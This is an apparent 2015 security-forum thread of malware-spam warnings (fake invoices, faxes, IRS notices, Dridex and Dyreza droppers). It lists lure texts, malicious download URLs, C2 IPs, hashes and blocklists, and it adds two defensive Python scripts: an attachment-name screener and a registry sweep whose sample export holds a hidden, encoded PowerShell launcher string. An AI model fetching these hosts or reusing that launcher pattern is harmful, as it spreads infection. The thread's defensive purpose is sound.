RESTAURANT GROUP PLC
In this case, the link in the email goes to: http ://igruv.tourstogo .us/oalroshimt/fokreeshoo/thovoaksij?arg1=victim@victimdomain.com&arg2=G27427P.vbs&arg3=RESTAURANT%20GROUP%20PLC
..which includes the -victim's- email address in the URL. In turn, this -redirects- to:
http ://igruv.tourstogo .us/oalroshimt/fokreeshoo/thovoaksij/files/G27427P.vbs
As the name suggests, this is a VBScript (VT 1/56*), in this case it is lightly obfuscated... and it initiates a download from:
http ://185.91.175.183/ sas/evzxce.exe
..which is saved as %TEMP%\jhvwrvcf.exe. The download location is 176.31.28.226 (OVH, France). This file has a VirusTotal detection rate of 6/57**. Automated analysis tools... show network connections to the following IPs:
144.76.73.3 (Hetzner, Germany)
5.44.216.44 (Camelhost SIA, Latvia)
62.210.214.249 (Iliad Entreprises / Poney Telecom, France)
89.184.66.18 (Invest Ltd, Ukraine)
... it drops a Dridex DLL with a detection rate of 3/57***.
Recommended blocklist:
176.31.28.226
144.76.73.3
5.44.216.44
62.210.214.249
89.184.66.18 ..."
* https://www.virustotal.com/en/file/1af0aba2c2f840f7e00691679900e9bbbd1c7e0b85d54baa80e5b8b6e9424c43/analysis/1429710473/
** https://www.virustotal.com/en/file/1dbcf2fe7118b807a66bdc94512049b49de1f2aa6fb5b109fb1fe6d8a059a68b/analysis/1429710529/
*** https://www.virustotal.com/en/file/8170c29309c2c0a691dddf649973e0c40aff93ad64018864e8911803c28ea35d/analysis/1429711770/
___
IRS Spam
- http://threattrack.tumblr.com/post/117024679123/irs-spam
Apr 21, 2015 - "Subjects Seen
Your FED TAX payment (ID:X3ZIRS507273813) was Rejected
Typical e-mail details:
*** PLEASE DO NOT RESPOND TO THIS EMAIL ***
Your federal Tax payment (ID: X3ZIRS507273813), recently sent from your checking account was returned by the your financial institution.
For more information, please download attached notification. (Security Adobe PDF file)
Transaction Number: X3ZIRS507273813}
Payment Amount: $ 5478.41
Transaction status: Rejected
ACH Trace Number: 8888888888
Transaction Type: ACH Debit Payment-DDA
Internal Revenue Service
Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD 20785.
Malicious File Name and MD5:
FEDERAL_tax_notify.exe (344afdc58ad6d110f1b3f8dbdbb86576)
Screenshot: https://40.media.tumblr.com/18d2466dbc75a3d74236ca52577432cc/tumblr_inline_nn6c1csfLG1r6pupn_500.png
Tagged: IRS, Ruckgov
:fear: :mad:
AplusWebMaster
2015-04-23, 13:23
FYI...
Fake 'Refund on Order' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/refund-on-order-204-2374256-3787503-amazon-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
23 Apr 2015 - "'Refund on order 204-2374256-3787503' pretending to come from Amazon .co.uk <payments-messages@ amazon .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Refund-on-order-204-2374256-3787503.png
23 April 2015 : 204-2374256-3787503-credit-note.doc - Current Virus total detections: 4/54*
... the malicious macro inside this example downloads myshland .com/42/335.exe which is saved and run as %Temp%\pierre5.exe (Virus Total**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ce15debd4312acf2f6546c1bab4287cd410ed82e021f55d051634e6a416ad11a/analysis/1429773545/
** https://www.virustotal.com/en/file/f5720136e987a0826a0ca2b45de3bcb880be3b055ea96f60e4ef06193047596d/analysis/1429775442/
- http://blog.dynamoo.com/2015/04/malware-spam-refund-on-order-204.html
23 Apr 2015
... Recommended blocklist:
185.12.95.191
87.236.215.151
94.23.171.198
185.35.77.250
149.154.64.70 ..."
___
Fake 'Annual report' SPAM - PDF malware
- http://myonlinesecurity.co.uk/annual-report-olivia-cdc-co-uk-fake-pdf-malware/
23 Apr 2015 - "'Annual report' pretending to come from olivia <olivia@ cdc .co.uk> with a zip attachment is another one from the current bot runs... The email looks like:
Hi,
Annual report sent to you, maybe yours.
CDC Consulting
Algyr le parc
119 BL de la Bataille de Stalingrad
69100 Villeurbanne
23 April 2015: Annual report.zip: Extracts to: Luk22.exe
Current Virus total detections: 4/56* . This Annual report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/82d8e65a75e3d955d2fd850f4a7a17b31a4dc74660f664d15f1af42e7b3c2a3a/analysis/1429792521/
... Behavioural information
TCP connections
23.253.254.67: https://www.virustotal.com/en/ip-address/23.253.254.67/information/
81.7.109.65: https://www.virustotal.com/en/ip-address/81.7.109.65/information/
95.80.123.41: https://www.virustotal.com/en/ip-address/95.80.123.41/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
- http://threattrack.tumblr.com/post/117166725758/annual-report-spam
Apr 23, 2015
Tagged: Annual Report, Upatre, Dyreza
___
eFax Spam
- http://threattrack.tumblr.com/post/117170679183/efax-spam
Apr 23, 2015 - "Subjects Seen:
You have a new eFax from 977-374-7446 - 4 pages
Typical e-mail details:
eFax Message [Caller-ID: 977-374-7446]
You have received a 3 pages fax on Thu, 23 Apr 2015 08:20:40 -0600 .
You can view your eFax online, in PDF format, by visiting :
efax .com/documents/view_fax.aspx?utm_source=eFax&fax_type=doc&caller_id=977-374-7446
* This fax’s reference # is 50184025
Malicious URLs
91.194.254.239/fax_33663232.pdf.zip
Malicious File Name and MD5:
pdf_fax_33663232.pif (fe6e9444534f34f735fa94eb7c526207)
Screenshot: https://36.media.tumblr.com/b8f64613505e316d4568ed3a777acb81/tumblr_inline_nn9k9cJQc61r6pupn_500.png
91.194.254.239: https://www.virustotal.com/en/ip-address/91.194.254.239/information/
Tagged: eFax, Dyreza
:fear: :mad:
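Several of the posts above (HSBC, Exchange, voice message, Annual report) warn about the same trick: an attachment such as WAV0004291.wav.exe or Exchange.exe carries a document icon and, with "show known file extensions" off, passes for a PDF or wav. An attachment screen for that pattern, written here as an added example (not code from myonlinesecurity.co.uk or any of the quoted blogs; the extension lists and sample archives are constructed assumptions):

```python
import io
import zipfile
from pathlib import PurePosixPath

# Extensions Windows runs on double-click; a partial list (assumption).
EXECUTABLE_EXTS = {".exe", ".pif", ".scr", ".com", ".bat", ".cmd",
                   ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}
# Office formats that can carry a macro (the .doc/.xls/.docm droppers above).
MACRO_EXTS = {".doc", ".xls", ".docm", ".xlsm"}
# Document types the spoofed icons imitate (pdf, wav, ...).
DECOY_EXTS = {".pdf", ".wav", ".doc", ".xls", ".txt", ".jpg"}


def classify_name(name):
    """Return reasons a file name is risky; an empty list means no finding."""
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    reasons = []
    if not suffixes:
        return reasons
    last = suffixes[-1]
    if last in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {last}")
        # WAV0004291.wav.exe: a decoy extension in front of the real one.
        if len(suffixes) >= 2 and suffixes[-2] in DECOY_EXTS:
            reasons.append(
                f"double extension: looks like {suffixes[-2]} but runs as {last}")
    elif last in MACRO_EXTS:
        reasons.append(f"macro-capable Office document {last}")
    return reasons


def screen_zip(data):
    """Map suspicious member names inside a zip attachment to their reasons.

    Member names are readable even when the archive is password protected
    (as with Exchange_id3405629.zip above), so no password is needed here.
    """
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = classify_name(info.filename)
            if reasons:
                findings[info.filename] = reasons
    return findings


def screen_attachment(filename, data=None):
    """Screen one attachment: zips are opened, anything else judged by name."""
    if filename.lower().endswith(".zip") and data is not None:
        try:
            return screen_zip(data)
        except zipfile.BadZipFile:
            return {filename: ["claims to be a zip but is not a valid archive"]}
    reasons = classify_name(filename)
    return {filename: reasons} if reasons else {}


def build_sample_zip(members):
    """Build a zip in memory from constructed member names (dummy contents)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in members:
            zf.writestr(name, b"not a real payload")
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed samples modelled on the attachment names quoted above.
    samples = {
        "WAV0004291.wav.zip": build_sample_zip(["WAV0004291.wav.exe"]),
        "E-Ticket 7694892.zip": build_sample_zip(["E-Ticket 7694892.js"]),
        "SI19779D.docm": None,
        "Sales Invoice 519658.pdf": None,
    }
    for name, data in samples.items():
        print(name, "->", screen_attachment(name, data) or "no name-based finding")
```

Name screening catches the disguised .exe/.pif/.js droppers and the macro documents but not a genuine PDF with embedded scripts like the Colin Fox 'Invoice 519658' sample, which needs content inspection or the reader's Protected View.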
AplusWebMaster
2015-04-24, 13:47
FYI...
Fake 'Invoice' SPAM - malicious PDF attachment
- http://myonlinesecurity.co.uk/invoice-519658-colin-fox-pdf-malware/
24 Apr 2015 - "'Invoice 519658' pretending to come from Colin Fox <colin@nofss .co .uk> with a PDF attachment is another one from the current bot runs... This email contains a genuine PDF which has embedded -scripts- that will infect you. So far none of the automatic analysis tools can find any malicious content but it is trying to send multicast messages... this evil pdf when opened in Adobe reader drops a word document containing macros, so DO NOT SAVE OR OPEN THIS PDF FILE: Just -delete- the email and any attachment as soon as it appears in your inbox. There appear to be several different versions of the PDF malware dropper although all are named the same and every copy that I have seen is the same file size (23kb). The malicious macro inside the dropped word document (VirusTotal*) from one of the malicious PDF downloads and executes -> http ://bepminhchi .com/83/61.exe (virus total**)... Adobe reader in recent versions has 'Protected view' automatically -enabled- and unless you press the button to enable all features, you will be safe from this attack...
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/pdf-protected-view.png
If you do enable all features, then you have a second chance to protect yourself, by pressing either cancel or never allow opening files of this type on the pop up warning. Pressing allow WILL almost certainly automatically open the word doc and run the malicious macro so infecting you. Make sure Adobe reader (or any other PDF reader software) is updated to the -latest- version to protect you. Older versions are vulnerable to these attacks. If using Adobe make sure you -uncheck- any additional offerings of security scans/Google chrome or toolbars that it wants to include in the download:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/doc4.png
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Invoice-519658.png
24 April 2015: Sales Invoice 519658.pdf - Current Virus total detections: 2/57***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0a6e5154f6ce5ca566d3cdcbd5f5ed4ae8c5922d12eb8592595e7455f793596a/analysis/1429860267/
** https://www.virustotal.com/en/file/86d5ea371b13ad40d85957bf2e6b1883c3c413f1689a281ef4fbca7f89cb1fbc/analysis/1429860321/
... Behavioural information
TCP connections
185.12.95.191: https://www.virustotal.com/en/ip-address/185.12.95.191/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
*** https://www.virustotal.com/en/file/5b7d4e88f901f5a7519b3f3ecaf8594d7366fec6f3b4acaf51a1a5175996b4d9/analysis/1429858901/
bepminhchi .com: 115.146.126.39: https://www.virustotal.com/en/ip-address/115.146.126.39/information/
- http://blog.dynamoo.com/2015/04/malware-spam-colin-fox-colinnofsscouk.html
24 Apr 2015
... Recommended blocklist:
185.12.95.191
149.154.64.70
78.24.218.186
89.28.83.228 "
___
Fake 'Western Order' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-pidwell-nigel.html
24 Apr 2015 - "The spam email is not from SSE Contracting, but is instead a simple forgery with a malicious attachment:
Screenshot: https://4.bp.blogspot.com/-VMHqpJpfhpg/VToci4IngnI/AAAAAAAAGko/vtIf6VcuCgo/s1600/sse-enterprise.png
So far I have only seen one sample Western Order.doc [VT 4/57*] which contains a malicious macro... which is functionally identical to the one used in this spam run** which was also happening this morning."
* https://www.virustotal.com/en/file/e6dfcf8ca155e5d2fc448288daaaf4ca3575024b0128ecaa4f25043521427190/analysis/1429871852/
** http://blog.dynamoo.com/2015/04/malware-spam-colin-fox-colinnofsscouk.html
- http://myonlinesecurity.co.uk/western-order-sse-contracting-limited-nigel-pidwell-word-doc-or-excel-xls-spreadsheet-malware/
24 Apr 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Western-Order.png
"... same dridex malware that was dropped by today’s earlier malware run 'Invoice 519658 Colin Fox' – PDF malware*..."
* http://myonlinesecurity.co.uk/invoice-519658-colin-fox-pdf-malware/
___
Fake 'invoice for car repairs' SPAM – PDF malware
- http://myonlinesecurity.co.uk/invoice-for-car-felgen-garage-claus-leykauf-fake-pdf-malware/
24 Apr 2015 - "'invoice for car #' random numbers coming from random email addresses with a zip attachment is another one from the current bot runs... The email looks like:
hi,
The invoice for car repairs.
Gruss, Claus
Claus Leykauf
Galgengasse 14
91257 Pegnitz
Germany
tel.: +49 (0) 9241 724785
fax: +49 (0) 9241 724786
mobile: +49 (0) 172 8801123 ...
24 April 2015: ed0j5av43xs04bk #19641661.zip: Extracts to: car-repairs.exe
Current Virus total detections: 0/58* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c8f889397a67da0043a58073486a718aff55b08a959a359fd5d0d79c14dcd07/analysis/1429872340/
___
Fake 'You win green card' – malware attachment
- http://myonlinesecurity.co.uk/you-win-green-card-malware/
24 Apr 2015 - "'You win green card' pretending to come from USA Green > <random email addresses> with a zip attachment is another one from the current bot runs... The email looks like:
Your requested report is attached here. USA.
24 April 2015: green_card_usa_483273289748923749823798.zip: Extracts to: green_card_usa_483273289748923749823798.exe
Current Virus total detections: 5/56* ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/de70dd9d3c7b992cef1dcf04ca55dbc5945993f2eedc6f72b403724e0af3d96e/analysis/1429873777/
___
Fileless Malware ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
Updated April 22, 2015 - "... It’s no longer enough for malware to rely on dropping copies of themselves to a location specified in the malware code and using persistence tactics like setting up an autostart feature to ensure that they continue to run. Security file scanners can easily block and detect these threats. A tactic we have spotted would be using fileless malware. Unlike most malware, fileless malware hides itself in locations that are difficult to scan or detect. Fileless malware exists only in memory and is written directly to RAM instead of being installed in the target computer’s hard drive. POWELIKS* is an example of fileless malware that is able to hide its malicious code in the Windows Registry. These use a conventional malware file to add the entries with its malicious code in the registry... Another example of fileless malware is “Phasebot,” which we found being peddled in websites that sell malware and other malicious online tools by the supposed malware creator. We detect Phasebot as TROJ_PHASE.A. Phasebot contains -both- rootkit and fileless execution capabilities. We noticed that this malware had the same features as Solarbot**, an old bot that was first seen in the wild around late 2013. This is made more evident when we compared the sites that sold the two malware(s)... Compared to Solarbot, Phasebot places a distinct emphasis on stealth and evasion mechanisms. It -encrypts- its communications to its C&C server by using random passwords each time it connects to the server. The malware was designed to check if the following programs are installed in the affected system:
.NET Framework Version 3.5
Windows PowerShell
... Both of these programs are integrated into current versions of Windows. After verifying that the affected system has these programs, Phasebot creates the following registry key where the encrypted shell code will be written:
HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{Bot GUID}
... Using Windows PowerShell can also be seen as strategic because this tool is included in the initial installation packages of Windows OS versions 7 and higher. And since more users have computers that run on Windows 7 and higher, cybercriminals have a bigger net of potential victims. (And not coincidentally, the targeted .NET framework version 3.5 is also found in Windows 7 and higher)... It’s highly possible that they will not limit themselves to simply using the Windows registry to hide their malware... The emergence of fileless malware can be a serious threat to users who are not familiar with this type of infection. Users are often advised to look for suspicious files or folders, but -not- in places like the Windows registry, which is used for fileless infection... Because fileless malware are hard to detect, they’re also difficult to remove. Much like rootkits, the location of the malware makes detection and deletion more difficult than the typical malware infection..."
* https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/TROJ_POWELIKS.A
** http://www.infosecurity-magazine.com/news/napolar-solarbot-trojans-share-dna/
:fear::fear: :mad:
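The Phasebot write-up above names one concrete artefact a defender can look for: an Active Setup "Installed Components" subkey under HKCU that holds a launcher string and an encrypted payload blob rather than the usual per-user version marker. The script below is an added example written for this thread (it is not Trend Micro's tooling) that parses the text of a `reg export` of that hive and flags components whose values name a script host or carry an unusually large value. The key path is the one quoted above; the script-host list, the 512-byte threshold, the GUIDs and the payload bytes in the sample export are all constructed placeholders.

```python
"""Heuristic sweep of an exported registry hive for fileless-style persistence.

Added example written for this thread; it is not Trend Micro's tooling.
Assumptions: the input is the text of a 'reg export' (.reg) file of the
HKCU hive, the script-host list and size threshold are illustrative, and
the sample export at the bottom is constructed (placeholder GUIDs, dummy
payload bytes).
"""
import re
from collections import defaultdict

ACTIVE_SETUP = r"HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components"
# Interpreters a launcher value would name; a real policy would tune this list.
SCRIPT_HOSTS = ("powershell", "rundll32", "mshta", "wscript", "cscript", "regsvr32")
BLOB_THRESHOLD = 512  # bytes/chars in one value before it counts as a payload blob

_VALUE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def parse_reg(text):
    """Parse .reg text into {key_path: {value_name: (kind, data)}}.

    Handles "name"="string", @="default", dword:, and hex:/hex(n): values,
    including hex data continued over several lines with a trailing backslash.
    """
    keys = defaultdict(dict)
    current = None
    pending = None  # (name, kind, hex-so-far) while a hex value is being continued
    for raw in text.splitlines():
        line = raw.rstrip()
        if pending is not None:
            name, kind, acc = pending
            acc += line.strip().rstrip("\\")
            if line.endswith("\\"):
                pending = (name, kind, acc)
            else:
                keys[current][name] = (kind, bytes.fromhex(acc.replace(",", "")))
                pending = None
            continue
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = keys.get(current, {})  # register keys that have no values
            continue
        m = _VALUE.match(line)
        if m is None or current is None:
            continue
        name = m.group(1) if m.group(1) is not None else "(Default)"
        data = m.group(2)
        if data.startswith('"') and data.endswith('"'):
            keys[current][name] = ("sz", data[1:-1].replace('\\"', '"').replace("\\\\", "\\"))
        elif data.startswith("dword:"):
            keys[current][name] = ("dword", int(data[6:], 16))
        elif data.startswith("hex"):
            kind, _, hexpart = data.partition(":")
            if hexpart.endswith("\\"):
                pending = (name, kind, hexpart.rstrip("\\"))
            else:
                keys[current][name] = (kind, bytes.fromhex(hexpart.replace(",", "")))
    return dict(keys)


def find_suspicious(keys):
    """Flag Active Setup components under HKCU whose values look like a
    launcher or an embedded payload. Returns a list of (key_path, reason)."""
    findings = []
    for path, values in keys.items():
        if not path.lower().startswith(ACTIVE_SETUP.lower() + "\\"):
            continue
        for name, (kind, data) in values.items():
            if kind == "sz":
                if any(h in data.lower() for h in SCRIPT_HOSTS):
                    findings.append((path, f'value "{name}" launches a script host: {data[:60]}'))
                elif len(data) >= BLOB_THRESHOLD:
                    findings.append((path, f'value "{name}" holds {len(data)} chars of string data'))
            elif kind.startswith("hex") and len(data) >= BLOB_THRESHOLD:
                findings.append((path, f'value "{name}" holds {len(data)} bytes of binary data'))
    return findings


def _hex_lines(blob, per_line=25):
    """Render bytes the way reg export does: comma-separated hex, wrapped with '\\'."""
    parts = [f"{b:02x}" for b in blob]
    chunks = [",".join(parts[i:i + per_line]) for i in range(0, len(parts), per_line)]
    return ",\\\n  ".join(chunks)


# Constructed export: one ordinary per-user version marker and one component that
# carries a launcher string plus a large binary value (dummy bytes, not real shellcode).
SAMPLE_REG = (
    "Windows Registry Editor Version 5.00\n\n"
    "[" + ACTIVE_SETUP + "\\{11111111-2222-3333-4444-555555555555}]\n"
    '"Version"="10,0,1,0"\n\n'
    "[" + ACTIVE_SETUP + "\\{BOT-GUID-PLACEHOLDER}]\n"
    '"StubPath"="powershell.exe -w hidden -enc <base64-placeholder>"\n'
    '"Payload"=hex:' + _hex_lines(bytes(range(256)) * 3) + "\n"
)

if __name__ == "__main__":
    for key, reason in find_suspicious(parse_reg(SAMPLE_REG)):
        print(f"{key}\n    {reason}")
```

Run it against a real export with `reg export "HKCU\Software\Microsoft\Active Setup" hkcu-activesetup.reg` and feed the file's text to `parse_reg`; the size threshold is the part worth tuning, since legitimate per-user entries normally hold little more than a version string.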
AplusWebMaster
2015-04-27, 14:05
FYI...
Fake 'Invoice' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-1138593-bookingcom-invoice.html
27 Apr 2015 - "This fake invoice email does -not- come from Booking .com but is a simple forgery with a malicious attachment.
From: invoice@ booking .com
Date: 27 April 2015 at 08:55
Subject: [1138593] Booking.com Invoice 01/03/2015 - 31/03/2015
Dear customer,
Herewith you receive the electronic invoice regarding the commissions for the period from 01/03/2015 to 31/03/2015.
If you have any questions, please contact our Credit Control Department at telephone number
+44 (0)208 612 8210 (e-mail: ).
Thank you for working with Booking .com.
The only sample I have seen of this is badly mangled and required some work to extract and decode the attachment invoice-1501383360.doc which has a VirusTotal detection rate of 3/57*. This contains a malicious macro... which downloads a component from the following location:
http ://voipconcerns .com/62/927.exe
There are probably other slightly different versions of the Word document that download from different locations, however the binary will be the same. This malicious executable is saved as %TEMP%\zigma2.5.exe and has a VirusTotal detection rate of 2/57**. Automated analysis tools... show an attempted network connection to:
185.12.95.191 (RuWeb CJSC, Russia)
According to the Malwr report it also drops a malicious Dridex DLL with a detection rate of 4/57***..."
* https://www.virustotal.com/en/file/17d4aeca44259e84b2d7556b0e96b3a8a54bef816881bf796ab994cb1963efb0/analysis/1430122282/
** https://www.virustotal.com/en/file/77b1019db74ef3208cb38b6f213cd7725e9a2573019e60bb5358f7e2245cd74d/analysis/1430122455/
*** https://www.virustotal.com/en/file/86389f29e5421249163650f6fcb3a5943b5bf78e8cdc0b32c9a0d525851250ca/analysis/1430123480/
185.12.95.191: https://www.virustotal.com/en/ip-address/185.12.95.191/information/
voipconcerns .com: 174.37.237.228: https://www.virustotal.com/en/ip-address/174.37.237.228/information/
- http://myonlinesecurity.co.uk/1138593-booking-com-invoice-01032015-31032015-word-doc-or-excel-xls-spreadsheet-malware/
27 April 2015 - " invoice-1501383360.doc - Current Virus total detections: 3/56*
... which connects to and downloads tom-lebaric .com/62/927.exe which is saved as %Temp%\zigma2.4.exe and automatically run ( VirusTotal*)..."
* https://www.virustotal.com/en/file/8f9dcb357facd7484c5ca3ada7174db8da7e4174d097ec7434318a0e2e51d2f0/analysis/1430121196/
tom-lebaric .com: 176.223.208.22: https://www.virustotal.com/en/ip-address/176.223.208.22/information/
___
Fake 'Hello' SPAM - malware attached
- http://myonlinesecurity.co.uk/hello-can-you-please-check-the-attachment-that-i-have-sent-i-need-your-help-rob-robichaud-fake-pdf-malware/
27 Apr 2015 - "An email saying 'Hello! Can you please check the Attachment that I have sent? I need your help' with the subject of 'HI your name@ your domain' coming from random email addresses with a zip attachment is another one from the current bot runs...The email looks like:
Hello! Can you please check the Attachment that I have sent? I need your help.
Thanks
Rob Robichaud
Hub City Auto Paints and Supplies Ltd.
A Division of Autochoice Parts & Paints
CSR
153 Loftus St
Moncton, NB ...
Each email has a random named attachment that is named after your email address. All extract to different named files with different #
27 April 2015: derek- #52256657.zip: Extracts to: LOG.exe
Current Virus total detections: 2/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/35c61632968387b136d9fe7e56ed7927688884748b71796072e639a9ce9691cf/analysis/1430135783/
... Behavioural information
TCP connections
176.106.122.31: https://www.virustotal.com/en/ip-address/176.106.122.31/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
UDP communications
191.233.81.105: https://www.virustotal.com/en/ip-address/191.233.81.105/information/
___
Fake 'Your account #513457796162 has been blocked' SPAM – malware attachment
- http://myonlinesecurity.co.uk/pauletta-stile-your-account-513457796162-has-been-blocked-malware/
27 April 2015 - "'Your account #513457796162 has been blocked' pretending to come from Pauletta Stile with a zip attachment is another one from the current bot runs... The email looks like:
Your account #513457796162 was blocked for violation of our TOS.
Please see attached.
Pauletta Stile
Langenbacherstr. 25 57586 Weitefeld
GERMANY
+49 2743 80 70
Weitefeld
+49 2743 00 03 56
I have only received 1 copy of this malware so far. The last time a similar one was spammed out, we saw them coming from random email addresses with random subject numbers and attachment numbers.
27 April 2015: 513457796162.zip: Extracts to: 513457796162.scr
Current Virus total detections: 1/31*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an Excel spreadsheet instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9de0c4fa110b430178b3f8c2b0d3f416f5c1deebcd646ea935c346d492ed1d94/analysis/1430140877/
... Behavioural information
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
- http://threattrack.tumblr.com/post/117526410988/account-blocked-spam
April 27, 2015
Tagged: Account Blocked, dalexis
___
Incoming Fax Spam
- http://threattrack.tumblr.com/post/117523874753/incoming-fax-spam
Apr 27, 2015 - "Subjects Seen
Incoming Fax
Typical e-mail details:
INCOMING FAX REPORT
*********************************************************
Date/Time: Mon, 27 Apr 2015 08:08:50 -0800
Speed: 4985bps
Connection time: 05:08
Pages: 5
Resolution: Normal
Remote ID: 638-493-5566
Line number: 9
DTMF/DID:
Description: Internal only
To download / view please download attached file
*********************************************************
Malicious File Name and MD5:
IncomingFax.exe (784f8d6818cd23dd18c8f059a6b5d3d5)
Screenshot: https://40.media.tumblr.com/ab71c25233e66668c08d5bfac5f56474/tumblr_inline_nnh35e2GXA1r6pupn_500.png
Tagged: Fax, Dyreza
___
Fake 'Invoice 215042210' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/invoice-215042210-from-front-range-wholesale-restaurant-supplies-inc-word-doc-or-excel-xls-spreadsheet-malware/
27 Apr 2015 - "'Invoice 215042210 from FRONT RANGE WHOLESALE RESTAURANT SUPPLIES INC.' pretending to come from “FRONT RANGE WHOLESALE RESTAURANT SUPPLIES INC.” <replyTo@ quickbooks .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Customer :
Your invoice is attached. Please remit payment at your earliest
convenience.
Thank you for your business – we appreciate it very much.
Sincerely,
FRONT RANGE WHOLESALE RESTAURANT SUPPLIES INC.
27 April 2015 : Inv_215042210_from_FRONT_RANGE_WHOLESALE_RESTAURANT_SUPPLIES_INC._5316.doc
Current Virus total detections: 2/57* which connects to and downloads 91.194.254.240 /us274/file.exe which in turn is saved as %Temp%\rramcgaq.exe and automatically runs... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d124d7db61728092a43c0f59c9af63bdf2e85ed732047ce7c19c63ed6e55d2b1/analysis/1430143720/
91.194.254.240: https://www.virustotal.com/en/ip-address/91.194.254.240/information/
:fear::fear: :mad:
AplusWebMaster
2015-04-28, 11:35
FYI...
Fake 'Privacy Policy' SPAM – malware
- http://myonlinesecurity.co.uk/re-hello-privacy-policy-database-of-contributors-malware/
28 April 2015 - "An email in garbled English about a database of contributors and their Privacy Policy with a subject of 'RE: Hello' pretending to come from Chanda <faucibus.id@ aliquet .com> with a zip attachment is another one from the current bot runs... The email looks like:
Hello!
Dear user! We consider a database of contributors and we found that we have signed with you our “Privacy Policy” and that we have an updated CV. We will be audited in the near future, and we need to update the record. For this reason, is attached to this e-mail confidentiality agreement that we pray thee firm and return them by email or fax as soon as possible. We also need you, please send us your resume updated for inclusion in the database. If you have any questions, please contact me.
With great respect !
28 April 2015: Privacy Policy.zip: Extracts to: Privacy Policy.doc.scr
Current Virus total detections: 6/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will pretend to be a word doc instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/92d6b2733e41e75890e27046990fb98bd212d9e46e65c2bbf0419e3f6317e28a/analysis/1430201347/
... Behavioural information
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
___
Fake 'INVOICE PD' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-invoice-pd-will-comm.html
28 April 2015 - "This malicious spam does not come from Will Communications but is instead a simple -forgery- with a malicious attachment.
From: richard will [contactwill@ hotmail .com]
Date: 28 April 2015 at 09:05
Subject: INVOICE PD Will Comm
Thank-you for your payment!
Richard Will
Will Communications, Inc.
richard@ willcommunications .com
The samples that I have seen are all corrupted, and the malicious attachment just appears as a jumble of Base 64 encoded text, although this may not be the case with every email. After extraction, the malicious Word document has a detection rate of 4/56* and it contains this malicious macro... In this case, the macro downloads a component from:
http ://massachusettsselfstorage .com/62/927.exe
..this is saved as %TEMP%\johan3.2.b.exe and has a detection rate of 3/53**. There may well be other documents that download from -other- locations, but the binary will be the same in all cases. Automated analysis tools... show that it attempts to communicate with the following IP:
185.12.95.191 (RuWeb CJSC, Russia)
According to the Malwr report it drops a malicious Dridex DLL with a detection rate of 2/56***."
* https://www.virustotal.com/en/file/09340206e6df0c53f75a902316a4fdb7b4bf24cfb9fcfae9d08b6f86e486bde3/analysis/1430209748/
** https://www.virustotal.com/en/file/5de0a2e35d38b7a3105395e828e5e742acb3e5842cdcf79913b9e8af19efa263/analysis/1430209765/
*** https://www.virustotal.com/en/file/a03e5bc6b9ee5d13da387a25dfc1a875cc5357d317053909977d97f545c0d3af/analysis/1430210575/
massachusettsselfstorage .com: 209.114.42.129: https://www.virustotal.com/en/ip-address/209.114.42.129/information/
